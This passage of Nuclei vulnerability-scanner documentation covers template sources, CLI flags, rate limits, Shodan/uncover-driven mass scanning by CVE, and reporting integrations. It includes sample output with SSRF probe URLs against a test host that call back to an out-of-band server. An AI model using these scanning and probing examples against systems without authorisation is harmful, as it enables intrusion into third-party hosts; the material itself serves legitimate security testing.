export GITHUB_TEMPLATE_REPO=my_nuclei_template
```
```bash
export GITLAB_SERVER_URL=https://gitlab.com
# The GitLab token must have the read_api and read_repository scope
export GITLAB_TOKEN=XXXXXXXXXX
# Comma separated list of repository IDs (not names)
export GITLAB_REPOSITORY_IDS=12345,67890
```
```bash
export AWS_ACCESS_KEY=AKIAXXXXXXXX
export AWS_SECRET_KEY=XXXXXX
export AWS_REGION=us-xxx-1
export AWS_TEMPLATE_BUCKET=aws_bucket_name
```
```bash
export AZURE_TENANT_ID=00000000-0000-0000-0000-000000000000
export AZURE_CLIENT_ID=00000000-0000-0000-0000-000000000000
export AZURE_CLIENT_SECRET=00000000-0000-0000-0000-000000000000
export AZURE_SERVICE_URL=https://XXXXXXXXXX.blob.core.windows.net/
export AZURE_CONTAINER_NAME=templates
```
Environment variables can also be provided to disable download from default and custom template locations:
```bash
# Disable download from the default nuclei-templates project
export DISABLE_NUCLEI_TEMPLATES_PUBLIC_DOWNLOAD=true
# Disable download from public / private GitHub project(s)
export DISABLE_NUCLEI_TEMPLATES_GITHUB_DOWNLOAD=true
# Disable download from public / private GitLab project(s)
export DISABLE_NUCLEI_TEMPLATES_GITLAB_DOWNLOAD=true
# Disable download from public / private AWS Bucket(s)
export DISABLE_NUCLEI_TEMPLATES_AWS_DOWNLOAD=true
# Disable download from public / private Azure Blob Storage
export DISABLE_NUCLEI_TEMPLATES_AZURE_DOWNLOAD=true
```
Once the environment variables are set, run the following command to download the custom templates:
```bash
nuclei -update-templates
```
This command will clone the repository containing the custom templates to the default nuclei templates directory (`$HOME/nuclei-templates/github/`).
The directory structure of the custom templates looks as follows:
```bash
tree $HOME/nuclei-templates/
nuclei-templates/
└── github/$GH_REPO_NAME # Custom templates downloaded from public / private GitHub project
└── gitlab/$GL_REPO_NAME # Custom templates downloaded from public / private GitLab project
└── s3/$BUCKET_NAME # Custom templates downloaded from public / private AWS Bucket
└── azure/$CONTAINER_NAME # Custom templates downloaded from public / private Azure Blob Storage
```
Users can then use the custom templates with the `-t` flag as follows:
```
nuclei -t github/my_custom_template -u https://example.com
```
The Nuclei engine can be updated to the latest version using the `-update` flag.
Writing your own unique templates will always keep you one step ahead of
others.
### AI-Powered Template Generation
`-ai`
Nuclei supports generating and running templates on-the-fly using AI capabilities powered by the ProjectDiscovery API. This feature allows you to perform quick, targeted scans without needing pre-written templates by describing what you want to detect in natural language.
**Prerequisites:**
1. A ProjectDiscovery API key (Get one at [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io))
2. Configure your API key using one of these methods:
**Method 1: Using CLI (Recommended)**
```bash
nuclei -auth
# Enter your API key when prompted
```
**Method 2: Environment Variable**
```bash
export PDCP_API_KEY=your_api_key_here
```
**Basic Usage:**
1. **Finding Sensitive Information Leaks:**
```bash
nuclei -list targets.txt -ai "Find admin_api_key in response"
```
2. **Detecting Debug Information:**
```bash
nuclei -list targets.txt -ai "Detect exposed stack traces in error messages"
```
3. **Discovering Admin Interfaces:**
```bash
nuclei -list targets.txt -ai "Find admin login endpoints"
```
4. **Identifying Exposed Secrets:**
```bash
nuclei -list urls.txt -ai "Detect secrets in response"
```
5. **Extract Page Titles**
```bash
nuclei -list targets.txt -ai "Extract page titles"
```
The `-ai` flag requires an active internet connection to communicate with the ProjectDiscovery API. Generated templates are stored both locally on your computer and in your ProjectDiscovery cloud account for future reference. For privacy, your prompts and generated templates are not used for AI training.
Currently, each user is limited to 100 AI template generation queries per day. This limit is subject to change based on usage patterns and to prevent abuse.
### Nuclei Flags
```
nuclei -h
```
This will display help for the tool. Here are all the switches it supports.
```console
Nuclei is a fast, template based vulnerability scanner focusing
on extensive configurability, massive extensibility and ease of use.
Usage:
nuclei [flags]
Flags:
TARGET:
-u, -target string[] target URLs/hosts to scan
-l, -list string path to file containing a list of target URLs/hosts to scan (one per line)
-eh, -exclude-hosts string[] hosts to exclude to scan from the input list (ip, cidr, hostname)
-resume string resume scan using resume.cfg (clustering will be disabled)
-sa, -scan-all-ips scan all the IP's associated with dns record
-iv, -ip-version string[] IP version to scan of hostname (4,6) - (default 4)
TARGET-FORMAT:
-im, -input-mode string mode of input file (list, burp, jsonl, yaml, openapi, swagger) (default "list")
-ro, -required-only use only required fields in input format when generating requests
-sfv, -skip-format-validation skip format validation (like missing vars) when parsing input file
TEMPLATES:
-nt, -new-templates run only new templates added in latest nuclei-templates release
-ntv, -new-templates-version string[] run new templates added in specific version
-as, -automatic-scan automatic web scan using wappalyzer technology detection to tags mapping
-t, -templates string[] list of template or template directory to run (comma-separated, file)
-turl, -template-url string[] template url or list containing template urls to run (comma-separated, file)
-w, -workflows string[] list of workflow or workflow directory to run (comma-separated, file)
-wurl, -workflow-url string[] workflow url or list containing workflow urls to run (comma-separated, file)
-validate validate the passed templates to nuclei
-nss, -no-strict-syntax disable strict syntax check on templates
-td, -template-display displays the templates content
-tl list all available templates
-sign signs the templates with the private key defined in NUCLEI_SIGNATURE_PRIVATE_KEY env variable
-code enable loading code protocol-based templates
-dut, -disable-unsigned-templates disable running unsigned templates or templates with mismatched signature
FILTERING:
-a, -author string[] templates to run based on authors (comma-separated, file)
-tags string[] templates to run based on tags (comma-separated, file)
-etags, -exclude-tags string[] templates to exclude based on tags (comma-separated, file)
-itags, -include-tags string[] tags to be executed even if they are excluded either by default or configuration
-id, -template-id string[] templates to run based on template ids (comma-separated, file, allow-wildcard)
-eid, -exclude-id string[] templates to exclude based on template ids (comma-separated, file)
-it, -include-templates string[] path to template file or directory to be executed even if they are excluded either by default or configuration
-et, -exclude-templates string[] path to template file or directory to exclude (comma-separated, file)
-em, -exclude-matchers string[] template matchers to exclude in result
-s, -severity value[] templates to run based on severity. Possible values: info, low, medium, high, critical, unknown
-es, -exclude-severity value[] templates to exclude based on severity. Possible values: info, low, medium, high, critical, unknown
-pt, -type value[] templates to run based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-ept, -exclude-type value[] templates to exclude based on protocol type. Possible values: dns, file, http, headless, tcp, workflow, ssl, websocket, whois, code, javascript
-tc, -template-condition string[] templates to run based on expression condition
OUTPUT:
-o, -output string output file to write found issues/vulnerabilities
-sresp, -store-resp store all request/response passed through nuclei to output directory
-srd, -store-resp-dir string store all request/response passed through nuclei to custom directory (default "output")
-silent display findings only
-nc, -no-color disable output content coloring (ANSI escape codes)
-j, -jsonl write output in JSONL(ines) format
-irr, -include-rr -omit-raw include request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only) [DEPRECATED use -omit-raw] (default true)
-or, -omit-raw omit request/response pairs in the JSON, JSONL, and Markdown outputs (for findings only)
-ot, -omit-template omit encoded template in the JSON, JSONL output
-nm, -no-meta disable printing result metadata in cli output
-ts, -timestamp enables printing timestamp in cli output
-rdb, -report-db string nuclei reporting database (always use this to persist report data)
-ms, -matcher-status display match failure status
-me, -markdown-export string directory to export results in markdown format
-se, -sarif-export string file to export results in SARIF format
-je, -json-export string file to export results in JSON format
-jle, -jsonl-export string file to export results in JSONL(ine) format
CONFIGURATIONS:
-config string path to the nuclei configuration file
-fr, -follow-redirects enable following redirects for http templates
-fhr, -follow-host-redirects follow redirects on the same host
-mr, -max-redirects int max number of redirects to follow for http templates (default 10)
-dr, -disable-redirects disable redirects for http templates
-rc, -report-config string nuclei reporting module configuration file
-H, -header string[] custom header/cookie to include in all http request in header:value format (cli, file)
-V, -var value custom vars in key=value format
-r, -resolvers string file containing resolver list for nuclei
-sr, -system-resolvers use system DNS resolving as error fallback
-dc, -disable-clustering disable clustering of requests
-passive enable passive HTTP response processing mode
-fh2, -force-http2 force http2 connection on requests
-ev, -env-vars enable environment variables to be used in template
-cc, -client-cert string client certificate file (PEM-encoded) used for authenticating against scanned hosts
-ck, -client-key string client key file (PEM-encoded) used for authenticating against scanned hosts
-ca, -client-ca string client certificate authority file (PEM-encoded) used for authenticating against scanned hosts
-sml, -show-match-line show match lines for file templates, works with extractors only
-ztls use ztls library with autofallback to standard one for tls13 [Deprecated] autofallback to ztls is enabled by default
-sni string tls sni hostname to use (default: input domain name)
-dt, -dialer-timeout value timeout for network requests.
-dka, -dialer-keep-alive value keep-alive duration for network requests.
-lfa, -allow-local-file-access allows file (payload) access anywhere on the system
-lna, -restrict-local-network-access blocks connections to the local / private network
-i, -interface string network interface to use for network scan
-at, -attack-type string type of payload combinations to perform (batteringram,pitchfork,clusterbomb)
-sip, -source-ip string source ip address to use for network scan
-rsr, -response-size-read int max response size to read in bytes (default 10485760)
-rss, -response-size-save int max response size to read in bytes (default 1048576)
-reset reset removes all nuclei configuration and data files (including nuclei-templates)
-tlsi, -tls-impersonate enable experimental client hello (ja3) tls randomization
INTERACTSH:
-iserver, -interactsh-server string interactsh server url for self-hosted instance (default: oast.pro,oast.live,oast.site,oast.online,oast.fun,oast.me)
-itoken, -interactsh-token string authentication token for self-hosted interactsh server
-interactions-cache-size int number of requests to keep in the interactions cache (default 5000)
-interactions-eviction int number of seconds to wait before evicting requests from cache (default 60)
-interactions-poll-duration int number of seconds to wait before each interaction poll request (default 5)
-interactions-cooldown-period int extra time for interaction polling before exiting (default 5)
-ni, -no-interactsh disable interactsh server for OAST testing, exclude OAST based templates
FUZZING:
-ft, -fuzzing-type string overrides fuzzing type set in template (replace, prefix, postfix, infix)
-fm, -fuzzing-mode string overrides fuzzing mode set in template (multiple, single)
-fuzz enable loading fuzzing templates
UNCOVER:
-uc, -uncover enable uncover engine
-uq, -uncover-query string[] uncover search query
-ue, -uncover-engine string[] uncover search engine (shodan,censys,fofa,shodan-idb,quake,hunter,zoomeye,netlas,criminalip,publicwww,hunterhow) (default shodan)
-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")
-ul, -uncover-limit int uncover results to return (default 100)
-ur, -uncover-ratelimit int override ratelimit of engines with unknown ratelimit (default 60 req/min) (default 60)
RATE-LIMIT:
-rl, -rate-limit int maximum number of requests to send per second (default 150)
-rlm, -rate-limit-minute int maximum number of requests to send per minute
-bs, -bulk-size int maximum number of hosts to be analyzed in parallel per template (default 25)
-c, -concurrency int maximum number of templates to be executed in parallel (default 25)
-hbs, -headless-bulk-size int maximum number of headless hosts to be analyzed in parallel per template (default 10)
-headc, -headless-concurrency int maximum number of headless templates to be executed in parallel (default 10)
-jsc, -js-concurrency int maximum number of javascript runtimes to be executed in parallel (default 120)
-pc, -payload-concurrency int max payload concurrency for each template (default 25)
OPTIMIZATIONS:
-timeout int time to wait in seconds before timeout (default 10)
-retries int number of times to retry a failed request (default 1)
-ldp, -leave-default-ports leave default HTTP/HTTPS ports (eg. host:80,host:443)
-mhe, -max-host-error int max errors for a host before skipping from scan (default 30)
-te, -track-error string[] adds given error to max-host-error watchlist (standard, file)
-nmhe, -no-mhe disable skipping host from scan based on errors
-project use a project folder to avoid sending same request multiple times
-project-path string set a specific project path
-spm, -stop-at-first-match stop processing HTTP requests after the first match (may break template/workflow logic)
-stream stream mode - start elaborating without sorting the input
-ss, -scan-strategy value strategy to use while scanning(auto/host-spray/template-spray) (default auto)
-irt, -input-read-timeout value timeout on input read (default 3m0s)
-nh, -no-httpx disable httpx probing for non-url input
-no-stdin disable stdin processing
HEADLESS:
-headless enable templates that require headless browser support (root user on Linux will disable sandbox)
-page-timeout int seconds to wait for each page in headless mode (default 20)
-sb, -show-browser show the browser on the screen when running templates with headless mode
-ho, -headless-options string[] start headless chrome with additional options
-sc, -system-chrome use local installed Chrome browser instead of nuclei installed
-lha, -list-headless-action list available headless actions
DEBUG:
-debug show all requests and responses
-dreq, -debug-req show all sent requests
-dresp, -debug-resp show all received responses
-p, -proxy string[] list of http/socks5 proxy to use (comma separated or file input)
-pi, -proxy-internal proxy all internal requests
-ldf, -list-dsl-function list all supported DSL function signatures
-tlog, -trace-log string file to write sent requests trace log
-elog, -error-log string file to write sent requests error log
-version show nuclei version
-hm, -hang-monitor enable nuclei hang monitoring
-v, -verbose show verbose output
-profile-mem string optional nuclei memory profile dump file
-vv display templates loaded for scan
-svd, -show-var-dump show variables dump for debugging
-ep, -enable-pprof enable pprof debugging server
-tv, -templates-version shows the version of the installed nuclei-templates
-hc, -health-check run diagnostic check up
UPDATE:
-up, -update update nuclei engine to the latest released version
-ut, -update-templates update nuclei-templates to latest released version
-ud, -update-template-dir string custom directory to install / update nuclei-templates
-duc, -disable-update-check disable automatic nuclei/templates update check
STATISTICS:
-stats display statistics about the running scan
-sj, -stats-json display statistics in JSONL(ines) format
-si, -stats-interval int number of seconds to wait between showing a statistics update (default 5)
-mp, -metrics-port int port to expose nuclei metrics on (default 9092)
CLOUD:
-auth configure projectdiscovery cloud (pdcp) api key (default true)
-cup, -cloud-upload upload scan results to pdcp dashboard
-sid, -scan-id string upload scan results to given scan id
AUTHENTICATION:
-sf, -secret-file string[] path to config file containing secrets for nuclei authenticated scan
-ps, -prefetch-secrets prefetch secrets from the secrets file
```
From Nuclei v3.0.0, the `-metrics` flag has been removed and merged with `-stats`.
When the `-stats` flag is used, metrics are available by default at `localhost:9092/metrics`,
and the port can be configured with the `-metrics-port` flag.
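For example (using the default metrics path noted above, with a custom port purely as an illustration):
```bash
# Run a scan with statistics enabled and metrics exposed on port 9093
nuclei -l targets.txt -stats -metrics-port 9093
# In another shell, the metrics can then be fetched with:
# curl localhost:9093/metrics
```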
### Rate **Limits**
Nuclei has multiple rate limit controls covering different factors: the number of templates to execute in parallel, the number of hosts to scan in parallel for each template, and the global number of requests per second that Nuclei should make. Here is a description of each flag.
| Flag | Description |
| ---------- | -------------------------------------------------------------------- |
| rate-limit | Control the total number of requests to send per second              |
| bulk-size | Control the number of hosts to process in parallel for each template |
| c | Control the number of templates to process in parallel |
Feel free to play with these flags to tune your Nuclei scan speed and accuracy. For more details on tuning these flags, refer to [mass-scanning-cli](/tools/nuclei/mass-scanning-cli).
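For instance, a starting point that combines all three controls might look like this (example values only):
```bash
# Cap global throughput at 100 req/s, scan 50 hosts in parallel per template,
# and run 20 templates concurrently
nuclei -l targets.txt -rl 100 -bs 50 -c 20
```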
The `rate-limit` flag takes precedence over the other two flags; the number of
requests per second can't go beyond the value defined by the `rate-limit` flag
regardless of the values of the `c` and `bulk-size` flags.
### Traffic **Tagging**
Many bug bounty platforms/programs require you to identify the HTTP traffic you generate. This can be done by setting a custom header, either in the config file at `$HOME/.config/nuclei/config.yaml` or with the CLI flag `-H/-header`.
Setting custom header using config file
```yaml
# Headers to include with each request.
header:
- 'X-BugBounty-Hacker: h1/geekboy'
- 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) / nuclei'
```
Setting custom header using CLI flag
```bash
nuclei -header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) / nuclei' -list urls.txt -tags cves
```
### Template **Exclusion**
Nuclei supports a variety of methods for excluding / blocking templates from execution. By default, **nuclei** excludes the tags/templates listed below from execution to avoid unexpected fuzz-based scans and templates that are not meant to run in mass scans; these defaults can easily be overridden with the Nuclei configuration file / flags.
Nuclei engine supports two ways to manually exclude templates from a scan:
1. Exclude Templates (`-exclude-templates/exclude`)
The **exclude-templates** flag is used to exclude single or multiple templates or directories; the flag can be provided multiple times to supply multiple values.
2. Exclude Tags (`-exclude-tags/etags`)
The **exclude-tags** flag is used to exclude templates based on their defined tags; single or multiple tags can be provided.
Example of excluding single template
```
nuclei -list urls.txt -t cves/ -exclude-templates cves/2020/CVE-2020-XXXX.yaml
```
Example of multiple template exclusion
```
nuclei -list urls.txt -exclude-templates exposed-panels/ -exclude-templates technologies/
```
Example of excluding templates with single tag
```
nuclei -l urls.txt -t cves/ -etags xss
```
Example of excluding templates with multiple tags
```
nuclei -l urls.txt -t cves/ -etags sqli,rce
```
* [.nuclei-ignore](https://github.com/projectdiscovery/nuclei-templates/blob/main/.nuclei-ignore) list - the default list of tags and templates excluded from Nuclei scans.
The **.nuclei-ignore** file is not supposed to be modified by the user, as it is used by Nuclei internally. To override the ignore list, use the [nuclei configuration](/tools/nuclei/running#nuclei-config) file.
To prioritize certain templates or tags over the [.nuclei-ignore](https://github.com/projectdiscovery/nuclei-templates/blob/master/.nuclei-ignore) file or denylist, you must use the `-include-templates` or `-include-tags` flags. This will ensure that the specified templates or tags take precedence over any `.nuclei-ignore` or denylist entries.
Example of running blocked templates
```bash
nuclei -l urls.txt -include-tags iot,misc,fuzz
```
Example of executing a specific template that is in the denylist
Say you have custom templates globbed (`*`) in the denylist of the Nuclei configuration file.
```yaml
# ...
exclude-templates:
- 'custom/**/*.yaml'
```
But you just want to execute a specific template.
```bash
nuclei -l urls.txt -include-templates custom/specific-template.yaml
```
### List Template Path
The `-tl` option in Nuclei lists the paths of templates rather than executing them. This can help you inspect which templates would be used for a scan given your current template filters.
```sh
# Command to list templates (-tl)
nuclei -tags cve -severity critical,high -author geeknik -tl
```
### Scan on internet database
Nuclei supports integration with the [uncover module](https://github.com/projectdiscovery/uncover), which supports services like Shodan, Censys, Hunter, ZoomEye, and many more, to execute Nuclei against hosts returned by these databases.
Here are the uncover options to use:
```console
nuclei -h uncover
UNCOVER:
-uc, -uncover enable uncover engine
-uq, -uncover-query string[] uncover search query
-ue, -uncover-engine string[] uncover search engine (shodan,shodan-idb,fofa,censys,quake,hunter,zoomeye,netlas,criminalip) (default shodan)
-uf, -uncover-field string uncover fields to return (ip,port,host) (default "ip:port")
-ul, -uncover-limit int uncover results to return (default 100)
-ucd, -uncover-delay int delay between uncover query requests in seconds (0 to disable) (default 1)
```
You need to set the API key of the engine you are using as an environment variable in your shell.
```
export SHODAN_API_KEY=xxx
export CENSYS_API_ID=xxx
export CENSYS_API_SECRET=xxx
export FOFA_EMAIL=xxx
export FOFA_KEY=xxx
export QUAKE_TOKEN=xxx
export HUNTER_API_KEY=xxx
export ZOOMEYE_API_KEY=xxx
```
Required API keys can be obtained by signing up on the following platforms: [Shodan](https://account.shodan.io/register), [Censys](https://censys.io/register), [Fofa](https://fofa.info/toLogin), [Quake](https://quake.360.net/quake/#/index), [Hunter](https://user.skyeye.qianxin.com/user/register?next=https%3A//hunter.qianxin.com/api/uLogin\&fromLogin=1) and [ZoomEye](https://www.zoomeye.org/login).
Example of template execution using a search query.
```
export SHODAN_API_KEY=xxx
nuclei -id 'CVE-2021-26855' -uq 'vuln:CVE-2021-26855' -ue shodan
```
Nuclei can also read queries from template metadata and execute the template against hosts returned by uncover for that query.
Example of template execution using template-defined search queries.
Template snippet of [CVE-2021-26855](https://github.com/projectdiscovery/nuclei-templates/blob/master/cves/2021/CVE-2021-26855.yaml)
```yaml
metadata:
shodan-query: 'vuln:CVE-2021-26855'
```
```console
nuclei -t cves/2021/CVE-2021-26855.yaml -uncover
nuclei -tags cve -uncover
```
We can update the nuclei configuration file to include these tags for all scans.
## Nuclei **Config**
> Since release of [v2.3.2](https://blog.projectdiscovery.io/nuclei-v2-3-0-release/) nuclei uses [goflags](https://github.com/projectdiscovery/goflags) for clean CLI experience and long/short formatted flags.
>
> [goflags](https://github.com/projectdiscovery/goflags) comes with auto-generated config file support that converts all available CLI flags into config file options; essentially, you can define any CLI flag in the config file to avoid repeating flags that should load as defaults for every Nuclei scan.
>
> Default path of nuclei config file is `$HOME/.config/nuclei/config.yaml`, uncomment and configure the flags you wish to run as default.
Here is an example config file:
```yaml
# Headers to include with all HTTP request
header:
- 'X-BugBounty-Hacker: h1/geekboy'
# Directory based template execution
templates:
- cves/
- vulnerabilities/
- misconfiguration/
# Template Filters
tags: exposures,cve
author: geeknik,pikpikcu,dhiyaneshdk
severity: critical,high,medium
# Template Allowlist
#
# Note: This will take precedence over the .nuclei-ignore file and denylist
# entries (exclude-tags or exclude-templates list).
include-tags: dos,fuzz # Tag based inclusion
include-templates: # Template based inclusion
- vulnerabilities/xxx
- misconfiguration/xxxx
# Template Denylist
exclude-tags: info # Tag based exclusion
exclude-templates: # Template based exclusion
- vulnerabilities/xxx
- misconfiguration/xxxx
# Rate Limit configuration
rate-limit: 500
bulk-size: 50
concurrency: 50
```
Once configured, the **config file will be used as default**; additionally, a custom config file can be provided using the `-config` flag.
**Running nuclei with custom config file**
```
nuclei -config project.yaml -list urls.txt
```
## Nuclei Result Dashboard
Nuclei now allows seamless integration with the ProjectDiscovery Cloud Platform to simplify the visualization of Nuclei results and generate swift reports. This highly requested feature from the community enables easier handling of scan results with minimal effort.
Follow the steps below to set up your PDCP Result Dashboard:
1. Visit [https://cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) to create a free PDCP API key.
2. Use the `nuclei -auth` command and enter your API key when prompted.
3. To perform a scan and upload the results straight to the cloud, use the `-cloud-upload` option while running a nuclei scan.
An example command might look like this:
```bash
nuclei -target http://honey.scanme.sh -cloud-upload
```
And the output would be like this:
```console
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.1.0
projectdiscovery.io
[INF] Current nuclei version: v3.1.0 (latest)
[INF] Current nuclei-templates version: v9.6.9 (latest)
[INF] To view results on cloud dashboard, visit https://cloud.projectdiscovery.io/scans upon scan completion.
[INF] New templates added in latest release: 73
[INF] Templates loaded for current scan: 71
[INF] Executing 71 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Using Interactsh Server: oast.live
[CVE-2017-9506] [http] [medium] http://honey.scanme.sh/plugins/servlet/oauth/users/icon-uri?consumerUri=http://clk37fcdiuf176s376hgjzo3xsoq5bdad.oast.live
[CVE-2019-9978] [http] [medium] http://honey.scanme.sh/wp-admin/admin-post.php?swp_debug=load_options&swp_url=http://clk37fcdiuf176s376hgyk9ppdqe9a83z.oast.live
[CVE-2019-8451] [http] [medium] http://honey.scanme.sh/plugins/servlet/gadgets/makeRequest
[CVE-2015-8813] [http] [high] http://honey.scanme.sh/Umbraco/feedproxy.aspx?url=http://clk37fcdiuf176s376hgj885caqoc713k.oast.live
[CVE-2020-24148] [http] [critical] http://honey.scanme.sh/wp-admin/admin-ajax.php?action=moove_read_xml
[CVE-2020-5775] [http] [medium] http://honey.scanme.sh/external_content/retrieve/oembed?endpoint=http://clk37fcdiuf176s376hgyyxa48ih7jep5.oast.live&url=foo
[CVE-2020-7796] [http] [critical] http://honey.scanme.sh/zimlet/com_zimbra_webex/httpPost.jsp?companyId=http://clk37fcdiuf176s376hgi9b8sd33se5sr.oast.live%23
[CVE-2017-18638] [http] [high] http://honey.scanme.sh/composer/send_email?to=hVsp@XOvw&url=http://clk37fcdiuf176s376hgyf8y81i9oju3e.oast.live
[CVE-2018-15517] [http] [high] http://honey.scanme.sh/index.php/System/MailConnect/host/clk37fcdiuf176s376hgi5j3fsht3dchj.oast.live/port/80/secure/
[CVE-2021-45967] [http] [critical] http://honey.scanme.sh/services/pluginscript/..;/..;/..;/getFavicon?host=clk37fcdiuf176s376hgh1y3xjzb3yjpy.oast.live
[CVE-2021-26855] [http] [critical] http://honey.scanme.sh/owa/auth/x.js
[INF] Scan results uploaded! View them at https://cloud.projectdiscovery.io/scans/clk37krsr14s73afc3ag
```
After the scan, a URL will be displayed on the command line interface. Visit this URL to check your results on the Cloud Dashboard.
### Advanced Integration Options
**Setting API key via environment variable**
To avoid entering your API key at the interactive prompt, set it as an environment variable.
```sh
export PDCP_API_KEY=XXXX-XXXX
```
**Enabling result upload by default**
If you want all your scans to automatically upload results to the cloud, enable the `ENABLE_CLOUD_UPLOAD` environment variable.
```sh
export ENABLE_CLOUD_UPLOAD=true
```
**Disabling cloud upload warnings**
To suppress warnings about result uploads, set the `DISABLE_CLOUD_UPLOAD_WRN` environment variable.
```sh
export DISABLE_CLOUD_UPLOAD_WRN=true
```
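For example, in a CI or other non-interactive environment you might combine these variables with a scan so results are uploaded without any prompt (a minimal sketch; the target is a placeholder):
```sh
# assumes PDCP_API_KEY holds a valid key created at cloud.projectdiscovery.io
export PDCP_API_KEY=XXXX-XXXX
export ENABLE_CLOUD_UPLOAD=true
nuclei -target https://example.com -cloud-upload
```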
Your configured PDCP API key is stored in `$HOME/.pdcp/credentials.yaml`.
Nuclei OSS results uploaded to the cloud platform are scheduled for automatic cleanup after 30 days, although this duration is subject to change as we gauge user feedback and requirements.
## Nuclei Reporting
Nuclei comes with reporting module support since the release of v2.3.0, with GitHub, GitLab, and Jira integrations. This allows the nuclei engine to automatically create tickets on the supported platform for found results.
| Platform | GitHub | GitLab | Jira | Markdown | SARIF | Elasticsearch | Splunk HEC | MongoDB |
| -------- | :----: | :----: | :--: | :------: | :---: | :-----------: | :--------: | :-----: |
| Support | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ | ✔ |
The `-rc, -report-config` flag can be used to provide a config file with the configuration details of the platform to integrate with. Here is an [example config file](https://github.com/projectdiscovery/nuclei/blob/main/cmd/nuclei/issue-tracker-config.yaml) for all supported platforms.
For example, to create tickets on GitHub, create a config file with the following content and replace the appropriate values:
```yaml
# GitHub contains configuration options for GitHub issue tracker
github:
username: '$user'
owner: '$user'
token: '$token'
project-name: 'testing-project'
issue-label: 'Nuclei'
duplicate-issue-check: true
```
Alternatively, if you use GitLab, create a config file with the following content and replace the appropriate values:
```yaml
# GitLab contains configuration options for GitLab issue tracker
gitlab:
username: '$user'
base-url: 'gitlab.com'
token: '$token'
project-name: 'testing-project'
issue-label: 'nuclei-label'
severity-as-label: true
duplicate-issue-check: true
```
To store results in Elasticsearch, create a config file with the following content and replace the appropriate values:
```yaml
# elasticsearch contains configuration options for elasticsearch exporter
elasticsearch:
# IP for elasticsearch instance
ip: 127.0.0.1
# Port is the port of elasticsearch instance
port: 9200
# IndexName is the name of the elasticsearch index
index-name: nuclei
```
To forward results to Splunk HEC, create a config file with the following content and replace the appropriate values:
```yaml
# splunkhec contains configuration options for splunkhec exporter
splunkhec:
# Hostname for splunkhec instance
host: '$hec_host'
# Port is the port of splunkhec instance
port: 8088
# IndexName is the name of the splunkhec index
index-name: nuclei
# SSL enables ssl for splunkhec connection
ssl: true
# SSLVerification disables SSL verification for splunkhec
ssl-verification: true
# HEC Token for the splunkhec instance
token: '$hec_token'
```
To forward results to Jira, create a config file with the following content and replace the appropriate values:
The Jira reporting options allow for custom fields, as well as using variables from the Nuclei templates in those custom fields.
The supported variables currently are: `$CVSSMetrics`, `$CVEID`, `$CWEID`, `$Host`, `$Severity`, `$CVSSScore`, `$Name`
In addition, Jira is strict when it comes to custom field entry. If the field is a dropdown, Jira accepts only the case-sensitive specific string, and the API call is slightly different. To support this, there are three types of custom fields:
* `name` is the dropdown value
* `id` is the ID value of the dropdown
* `freeform` allows the custom field to accept any value
To avoid duplicate tickets, the JQL query that is run can be adjusted through the config file.
The `CLOSED_STATUS` can be changed through the `status-not` value in the Jira section of the report config file.
`summary ~ TEMPLATE_NAME AND summary ~ HOSTNAME AND status != CLOSED_STATUS`
```yaml
jira:
# cloud is the boolean which tells if Jira instance is running in the cloud or on-prem version is used
cloud: true
# update-existing is the boolean which tells if the existing, opened issue should be updated or new one should be created
update-existing: false
# URL is the jira application url
url: https://localhost/jira
# account-id is the account-id of the Jira user or username in case of on-prem Jira
account-id: test-account-id
# email is the email of the user for Jira instance
email: test@test.com
# token is the token for Jira instance or password in case of on-prem Jira
token: test-token
# project-name is the name of the project.
project-name: test-project-name
# issue-type is the name of the created issue type (case sensitive)
issue-type: Bug
# SeverityAsLabel (optional) sends the severity as the label of the created issue
# Use custom fields for Jira Cloud instead
severity-as-label: true
# Whatever your final status is that you want to use as a closed ticket - Closed, Done, Remediated, etc.
# When checking for duplicates, the JQL query will filter out statuses that match this.
# If it finds a match _and_ the ticket does have this status, a new one will be created.
status-not: Closed
# Customfield supports name, id and freeform. name and id are to be used when the custom field is a dropdown.
# freeform can be used if the custom field is just a text entry
# Variables can be used to pull various pieces of data from the finding itself.
# Supported variables: $CVSSMetrics, $CVEID, $CWEID, $Host, $Severity, $CVSSScore, $Name
custom_fields:
customfield_00001:
name: 'Nuclei'
customfield_00002:
freeform: $CVSSMetrics
customfield_00003:
freeform: $CVSSScore
```
To write results to a MongoDB database collection, update the config file with the connection information.
```yaml
mongodb:
# the connection string to the MongoDB database
# (e.g., mongodb://root:example@localhost:27017/nuclei?ssl=false&authSource=admin)
connection-string: ""
# the name of the collection to store the issues
collection-name: ""
# excludes the Request and Response from the results (helps with filesize)
omit-raw: false
# determines the number of results to be kept in memory before writing it to the database or 0 to
# persist all in memory and write all results at the end (default)
batch-size: 0
```
**Running nuclei with reporting module:**
```bash
nuclei -l urls.txt -t cves/ -rc issue-tracker.yaml
```
Similarly, other platforms can be configured. Reporting module also supports basic filtering and duplicate checks to avoid duplicate ticket creation.
```yaml
allow-list:
severity: high,critical
```
This ensures tickets are only created for issues identified with **high** and **critical** severity; similarly, `deny-list` can be used to exclude issues with a specific severity.
If you are running periodic scans on the same assets, consider the `-rdb, -report-db` flag, which keeps a local copy of valid findings in the given directory; the reporting module uses it to compare results and **create tickets for unique issues only**.
```bash
nuclei -l urls.txt -t cves/ -rc issue-tracker.yaml -rdb prod
```
**Markdown Export**
Nuclei supports markdown export of valid findings with the `-me, -markdown-export` flag, which takes a directory as input to store markdown-formatted reports.
Including the request/response in the markdown report is optional; it is included when the `-irr, -include-rr` flag is used along with `-me`.
```bash
nuclei -l urls.txt -t cves/ -irr -markdown-export reports
```
**SARIF Export**
Nuclei supports SARIF export of valid findings with the `-se, -sarif-export` flag. This flag takes a file as input to store the SARIF-formatted report.
```bash
nuclei -l urls.txt -t cves/ -sarif-export report.sarif
```
It is also possible to visualize Nuclei results using **SARIF** files.
1. By uploading a SARIF file to [SARIF Viewer](https://microsoft.github.io/sarif-web-component/)
2. By uploading a SARIF file to [Github Actions](https://docs.github.com/en/code-security/code-scanning/integrating-with-code-scanning/uploading-a-sarif-file-to-github)
